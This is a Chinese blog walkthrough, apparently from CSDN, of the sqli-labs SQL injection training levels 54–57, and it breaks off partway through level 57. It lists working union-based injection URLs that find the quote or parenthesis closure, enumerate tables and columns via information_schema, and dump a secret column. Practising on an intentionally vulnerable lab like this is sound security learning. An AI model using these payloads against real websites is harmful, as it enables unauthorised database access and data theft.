sqli-labs(54-65)

本文详细介绍了在sqli-labs的第54到65关中如何利用SQL注入技巧进行闯关。通过判断不同的闭合方式,如单引号、双引号、括号等,以及使用联合查询、报错注入和盲注等方法,逐步揭露每一关的解决方案。在某些关卡中,由于尝试次数有限,需要精确的SQL语句和巧妙的注入策略来避免机会浪费。
摘要由CSDN通过智能技术生成

第54关:

根据这一关的提示,我们可以知道数据库的名字“chellenges”,我们需要知道“dump”的密码,才能通关,而且只有10次尝试机会

因为只有10次机会,所以判断闭合时需要猜测最常见的,所以先判断单引号、然后双引号、整形、最后括号

闭合方式:

/Less-54/?id=-1' union select 1,2,3--+

因为一直到库名,需要判断表名,注意语句要一次正确,可以在数据库中先测试是否正确

/Less-54/?id=-1' union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'--+

然后找出所有的列

192.168.31.9:8089/Less-54/?id=-1' union all select 1,group_concat(column_name),3 from information_schema.columns where table_name='53TFB5MZYC'--+

更具列爆出密码

/Less-54/?id=-1' union all select 1,group_concat(secret_2HIN),3 from 53TFB5MZYC --+

爆出密码后,将密码输入,这关就成功了

第55关:

这关与上一关一样,但是这一关用的闭合方式是“)”,确实是试了很多次才试出来,知道闭合方式以后,sql注入方式就和上一关一样了
注入sql:

/Less-55/?id=-1) union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'--+

第56关:

注入sql:

/Less-56/?id=-1') union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'--+

第57关:

注入sql:

/Less-
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值